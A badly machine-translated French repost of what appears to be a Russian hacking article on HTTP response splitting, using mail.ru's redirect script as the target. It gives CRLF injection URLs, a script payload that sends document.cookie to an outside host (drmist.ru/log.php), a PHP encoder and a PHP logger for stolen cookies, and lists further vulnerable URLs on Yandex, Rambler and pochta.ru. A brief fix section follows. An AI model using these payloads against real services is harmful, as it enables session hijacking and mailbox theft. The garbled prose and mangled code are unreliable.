HTTP fractionnement vulnérabilité

L'article rassmtrivaetsya vulnérabilités des applications pratiques, connues comme le fractionnement HTTP vulnérabilité

tête Buggy () sous le microscope

Errant à travers les étendues de l'Internet, on observe souvent des espèces url http://anyhost.com/redirect.php?url=http://otherhost.com ingénument en ne pensant pas en permanence clique simplement sur elle répond également aux otherhost.com. Un curieux utilisateur insère sur le local url adresse cvoey hompagi également convaincu le script krivosti.
En plus des gens très intéressants vivants simples et intéressants sur Internet. Ils percent le lien dans AccessDiver aussi commencent à apprendre le script.

1. L'essence du bogue.
2. Application pratique.
3. Situation de la prévalence de l'erreur.
4. Les moyens de protection.

pour les pétroliers suggère que AccessDiver - "hakresky", telle qu'elle est exprimée dans la nation, une arme. Téléchargez autorisé à offsayte projet. Au moment d'écrire ces lignes, la dernière version de l'utilitaire était 4.173. Le programme est surtout connu pour sa fonction HTTP debuger. Pour l'utiliser, vous pouvez en allant dans le mode expert et en sélectionnant l'option appropriée dans le menu Outils (F4 puis CTR + F9 - en fonction de la version de la clé peut varier). Ensuite, nous ne serons pas soin de se concentrer sur cette mise en place, peut-être pour faire face au plongeur peut tous les écoliers.

pour les expériences que nous avons choisi mail.ru , car il est le service postal le plus célèbre en RUNET et le lecteur sera particulièrement intéressé à connaître un bug sur ce projet;) Allons-y le lien http://go.mail.ru/urltracker?url=http:/ /www.security-teams.net. Nous étendrons le portail le plus souvent élu pour la sécurité informatique). Ajout d'un site à vos favoris et revenir à l'e-mail. Nous écrivons qui nous intéressait le lien au champ Adresse HTTP, mise égale à la mode Get, cliquez sur Connexion.
Nous avons devant nous serons les en-têtes HTTP retournées par le serveur, quelque chose comme le skrinshete:

Il devrait concerner la ligne soulignée. Titres Met Lieu :, navigateur nous amène inconditionnellement à l'URL spécifiée. Par conséquent, nous pouvons relier l'utilisateur à glisser, pour ainsi dire, dans le courrier, mais il devient vraiment ne pas envoyer. Cela est bien, mais en pratique, rien n'aliène pas.

Faites attention que les lignes dans le titre sont séparés par deux caractères 0Dh 0Ah. Et que, si à leur attribuer à la fin de la référence? Voyons voir ce que nous allons retourner la demande serveur objection http://go.mail.ru/urltracker?url=null%0D%0AHacked_by:%20drmist:

Comment intéressant. Donc, nous pouvons faire le serveur renvoie presque tous les titres. Par exemple, pour modifier les cookies des utilisateurs. Mais, encore une fois, ce n'est pas aussi intéressant que ce qui s'attarde avant. Fait intéressant, les en- têtes sont séparées de la séquence 0Dh 0Ah 0Dh 0Ah acte corporel. Sommes-nous capables de donner une pleine page? Entrez http://go.mail.ru/urltracker?url=% 0D% 0A% 0D% 0A <script> alert (document.cookie); </ script> <- aussi regarder:

Tout jaune - est le texte du document lui-même. Si votre navigateur est activé JavaScript, puis cliquez sur le lien, nous allons voir notre boîte de message avec le cookie. Afin de rendre l'attaque XSS, vous devez:
1) Créer un type de page <script> document.location = 'http://drmist.ru/log.php?'+document.cookie; </ script>
2) Transfert à url-encode en utilisant un script:

<? Php
$ Url = "http://go.mail.ru/urltracker?url=";
de $ s = "<script> document.location = 'http: //drmist.ru/log.php'";
$ S = "+ document.cookie; < / script>" .;
$ Res = "";
for ($ i = 0; $ i <strlen ($ s ); $ i ++)
{
$ Res = "%" .;
$ T = ord ([$ s $ i]);
if ($ t <16)
$ Res = "0" .;
$ Res = dechex ($ t) .;
}

.. Echo $ url "% 0d % 0a% 0d% 0a" $ res;
?>

Nous obtenons:
http://go.mail.ru/urltracker?url=%0d%0a%0d%0a%3c%73%63 ... etc. (**)

3) écrire un script log.php aussi le verser sur drmist.ru:
<? Php
fid $ = fopen ( "../ log.txt ", "a");
fputs (fid $, $ _SERVER [ "QUERY_STRING"] "\ r \ r \ r".);
fclose ($ fid);
header ( "Location: http://www.mail.ru") ;
?>

Aujourd'hui permis vparivat lien magique (**) et d'achat des cookies victime.
Comme il est permis de faire beaucoup de choses utiles, telles que l'accès au courrier électronique, mais plus sur cela dans une journée, nous sommes aussi tellement cool distrait du thème principal.

Bien sûr, il ne faut pas conduire sur le courrier, il est buggé merde de ressources, et enfin aucun moyen de sortir de notre bac à sable. Tous les gens ont tendance à faire l'erreur, cependant, les administrateurs meyl.ru mal moins souvent et moins souvent. Les vrais insectes demeurent. Les gens sont silencieux à leur sujet non pas à cause de la cupidité, mais par crainte d'une réponse inadéquate à l'administration de leur présence, qui, selon les statistiques, a une place. Heureusement, la présence de XSS ne garantit toujours pas avoir accès à la boîte aux lettres. Je suis sûr, je couvrirai un bug. Latest - par 2 jours. Vulnérable non seulement mail.ru. Nous vous recommandons fortement de lire:
http://yandex.ru/redir/?url=[XSS]
http://rambler.ru//click?_URL=[XSS]

Franchement, nous avons été surpris d'être grand à quel moment ont appris au sujet de ces vulnérabilités a écrit sur securitylab.ru il y a 3 ans (voir introduction CRLF en PHP fonction header () à partir de 10.09.2002), mais à cause de l'application pratique du bogue, nous ne pouvons pas Heard n'a jamais, elle a examiné le sujet à ce jour. En outre, blah blah vryatli autorisé à appeler pas la présence réelle de bugs sur Yandex, Rambler et le courrier.

Corrigez l'erreur de ne pas difficile. Que manger le script vulnérable:

<?
if (! isset ($ url) )
$ Url = "http://www.mail.ru";

header ( "Location: $ url" );

?>

Nous lui faisons invulnérable:

header ( "Location:" .urlencode ( $ url));

Si vous envisagez de rediriger uniquement dans un site, il est préférable de le faire:

header ( "Location: http://www.mail.ru/".urlencode($url)) ;

C'est probablement aussi tout ce que nous voulions dire. Laissez offre enfin plusieurs XSS:

http://talk.mail.ru/article.html?ID=31836089&page=1 "> <h1> XSS < / h1>
http://www.pochta.ru/?lng=en "<h1> XSS </ h1>

Vous aimez? Abonnez - vous à RSS nouvelles!
Vous pouvez également soutenir shram.kiev.ua, cliquez sur:

Ne soyez pas mal à vos amis et trouver cette information, partager avec eux l'article!

Développer / Réduire

Commentaires

Commentant, gardez à l' esprit que le contenu et le ton de vos messages peuvent blesser les sentiments des gens réels, montrer du respect et de la tolérance à ses interlocuteurs, même si vous ne partagez pas leur avis, votre comportement en termes de liberté d'expression et de l' anonymat offert par Internet, est en train de changer non seulement virtuel, mais dans le monde réel. Tous les commentaires sont cachés à l'index, le contrôle anti - spam.

Gratuit Carte de crédit avec une limite de 15.000 USD.

Toutes les Nouvelles

Comment choisir le vin à votre plat photo 08/03/2017
Comment habiller en fonction de l' âge et ne pas regarder stupide photo 08/03/2017
Version sexy de «Suivez - moi» photo 03/08/2017
Une assiette de nourriture saine photo 08/03/2017
La NASA a ouvert l' accès à son logiciel photo 08/03/2017
Kate Moss, la génération principale de la beauté, une femme fatale photo 08/03/2017
101 Comment utiliser parachute cordon photo 05/03/2017
Tout ce que vous vouliez savoir sur les pneus. types de marquage, la saisonnalité photo 05/03/2017
Comment choisir des épices et des herbes naturelles de haute qualité photo 04/03/2017
Emma Watson (26) Section pour la Foire Mars de Vanity photo 03/04/2017
Emma Watson (Emma Watson) déshabillée pour les livres de beauté du naturel photo 03/04/2017
Tatouage avec l'image des héros célèbres photo 03/03/2017
Conduire tous les transports urbains à Kiev photo 28/02/2017
Combien de fois faut - il avoir des relations sexuelles selon l'âge photo 28/02/2017
Calendrier Pêche et prévisions de poisson Paix / poissons prédateurs pour 2017. photo 26/02/2017
Pêche noeuds comment attacher un crochet, se préparant à voler photo 26/02/2017
Euthanasie Coaster, un projet de montagnes russes destinés à la peine de mort photo 26/02/2017
page WEB peut être une preuve en cour photo 26/02/2017
Dans ce cosplay vous voulez jouer vous - même photo 25/02/2017
collection élégante de filles en provenance du Japon. photo 25/02/2017
Collez GOI (de GOI - Institut optique Etat) photo 24/02/2017
Les choses inutiles qui devrait rapidement se débarrasser photo 24/02/2017
habitudes quotidiennes Bad, en raison de laquelle il est ballonnements photo 24/02/2017
moteurs d'avions de leviers de commande (ORE), on ne sait jamais ... La photo 24/02/2017
Modern Design Carte de visite photo 23/02/2017
Chats, artiste Vladimir Roumiantsev photo 23/02/2017
Faits intéressants au sujet du film Prometheus photo 23/02/2017
Comme indiqué sur la conférence de la NASA? photo 21/02/2017
SSL format de certificat, comment convertir un certificat en .pem, .cer, .crt, .der, pkcs ou .pfx photo 21/02/2017
Types de saignements et les premières règles relatives aux aides que vous devez savoir! photo 20/02/2017
Les premiers signes de diabète, vous ne devez pas ignorer! photo 20/02/2017

Comment choisir le vin à votre plat "- la viande, blanc - pour les poissons rouges" effet ... Photo 08/03/2017 Règle
Comment habiller en fonction de l' âge et ne pas regarder idiot de vous sentir à quel âge vous-même? Marchez, je suppose, comme un boutonneux ... Photo 08/03/2017
Version sexy de "Follow Me" il y a des photographes russes Murad et Natalia haussmannien quelques années créé ... Photo 08/03/2017
Assiette de nutrition saine de l' Université Harvard et détient de nombreuses recherches de la science moderne pour optimiser ... Photo 08/03/2017
La NASA a ouvert l' accès à son logiciel, la NASA a ouvert l' accès gratuit au catalogue de logiciels 2017-2018. Comment ... Photo 08/03/2017
Kate Moss, la génération principale de la beauté, une femme fatale Chaque génération a sa principale beauté, une femme fatale, qui ... Photo 08/03/2017
101 Parachute cordon de dosage Pour la plupart des gens parachute familiers cordon comme un outil très pratique pour ... Photo 05/03/2017
Tout ce que vous vouliez savoir sur les pneus. types de marquage, saisonniers pneus sont le principal lien entre la voiture et la route. De ... Photo 05/03/2017
Comment choisir les épices et les assaisonnements naturels de haute qualité Comment choisir les épices naturelles et d' herbes dans le marché ou dans le ... Photo 04/03/2017
Emma Watson (26 ans) déshabillée pour Vanity Fair Mars Emma déshabillée pour le magazine Vanity Fair en Mars, cependant, sur la couverture ... Photo 04/03/2017
Emma Watson (Emma Watson) déshabillée pour le livre Natural Beauty Emma a décidé de le faire pour le livre Natural Beauty! Et elle ... Photo 04/03/2017
Tatouage avec l'image des héros célèbres Bitansky artiste de tatouage crée des tatouages incroyablement réalistes avec des images de héros célèbres ... Photo 03/03/2017
Conduire tous Kiev transports urbains Scheme marqué tous les itinéraires de bus, trolleybus et de tramway, et ... Photo 28/02/2017
Combien de fois faut avoir des relations sexuelles selon l'âge Beaucoup de gens sont curieux de savoir, des relations sexuelles, ils sont trop nombreux ou trop ... Photo 28/02/2017
Calendrier Pêche et prévisions de poisson Paix / poissons prédateurs en 2017 Il y a certaines phases de la lumière lorsque vous avez juste besoin d'être seul ... Photo 26/02/2017
nœuds de pêche Comment attacher un crochet, se préparant à voler Type de noeud sélectionné en fonction du type de ligne de pêche (monofilament ou ... Photo 26/02/2017
Euthanasie Coaster, un projet de montagnes russes destinés à la peine de mort L'auteur reconnaît que les montagnes russes ne sont pas la machine optimale pour ... Photo 26/02/2017
page WEB peut être une preuve en justice doit être entendu que, par exemple, le droit d' auteur ne viole pas en soi ... Photo 26/02/2017 existante
Dans ce cosplay, vous aurez envie de jouer des jeux de base des prototypes costume - personnages de dessin animé, anime, jeux vidéo, films, ... Photo 25/02/2017
collection élégante de filles en provenance du Japon. Japonais (Jap nihondzin / nippondzin, Nihon minzoku.) - Le peuple, le principal (plus de 98%) ... Photo 25/02/2017
Collez GOI (de GOI - Institut optique Etat) pâte GOI peut être utilisé pour le polissage des produits de divers ... Photo 24/02/2017

Chats. Peintre Vladimir Roumiantsev. photo 23/02/2017
"Prometheus" - Faits intéressants photo 23/02/2017
Vu cheerleaders lituaniennes? A voir! 23/02/2017
Olsen, Elizabeth / Elizabeth Olsen photo 23/02/2017
Elle était assise près de la fenêtre, et il est allé dans sa voiture ... La photo 23/02/2017
Chats photo, chats, chatons photo 23/02/2017
Comment peut fonctionner Tortue photo 23/02/2017
Bengal Cat Talking With Kitten 23/02/2017
La Banque Nationale a publié une nouvelle pièce (Photo) photo 23/02/2017
Il y a Protasov Yar 30 ans photo 23/02/2017
Photo Animaux photo 23/02/2017
Traduction NASA Ce qui est dit à la conférence de la NASA photo 23/02/2017
Quelque chose au sujet de la taille de Jupiter, Courses "Through" Sun photo 22/02/2017
rues centrales de Kiev va bloquer pendant cinq jours photo 20/02/2017
3 façons de rendre les gens Vagina goulot d' étranglement et la fermeté photo 20/02/2017
Monica Bellucci Gq Magazine en Italie, Février 2017 photo 20/02/2017
«Serebro» Groupe B Magazine Maxim, Mars 2017 photo 20/02/2017
Que faire si vous êtes détenu par la police - Article 146 Piraterie photo 20/02/2017
Il y a un nouveau libre OS photo 18/02/2017
Bois sous le microscope électronique photo 18/02/2017
Paiement par carte de marché en 2016 a montré une croissance significative photo 18/02/2017

social

Chargement en cours ...

Votre adresse IP: 66.102.9.134
Votre Pays: États-Unis
Votre Région: Californie
Votre Ville: Mountain View

Free 50 UAH for your Monobank card?